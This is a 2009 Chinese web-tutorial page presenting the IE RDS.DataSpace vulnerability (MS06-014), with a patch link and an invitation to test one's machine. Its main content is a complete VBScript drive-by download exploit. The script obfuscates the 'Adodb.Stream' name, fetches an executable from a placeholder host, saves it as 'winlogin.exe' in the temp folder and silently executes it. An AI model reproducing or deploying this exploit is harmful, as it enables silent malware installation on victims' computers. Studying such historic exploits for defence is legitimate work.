当前位置: 首页 > 图文教程 > 网络编程 > Javascript > 【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件

Javascript
javascript进行客户端数据的校验
javascript中如何实现浏览器上的右键菜单
用javascript使链接按钮不断变化
利用javascript制作倒计时牌
用javascript实现变色背景和文字
让弹出窗口变得“体贴”一些(javascript)
javascript实例教程(1) 创建弹出式窗口
javascript实例教程(2) 创建折叠式导航菜单
javascript实例教程(3) 探测浏览器插件
javascript实例教程(4) 探测浏览器插件
javascript实例教程(5) 在一个表单中设置和检查Cookies
javascript实例教程(6) 利用javascript进行密码保护
javascript实例教程(7) 利用javascript基于浏览器类型的重定向
javascript实例教程(8) 检验表单有效性
javascript实例教程(9) 随机显示图片
javascript实例教程(10) 创建后退按钮
javascript实例教程(11) 隐藏script代码
javascript实例教程(12) 鼠标移过时报警
javascript实例教程(13) 鼠标触发窗口
javascript实例教程(14) JS代替CGI

Javascript 中的 【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-12   浏览: 374 ::
收藏到网摘: n/a

请执行下面的代码测试您的机器是否存在漏洞:
点击运行可以看到效果:
[Ctrl+A 全选 提示:你可先修改部分代码,再按运行]

补丁下载:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相关病毒的vbs代码如下:
复制代码 代码如下:

on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0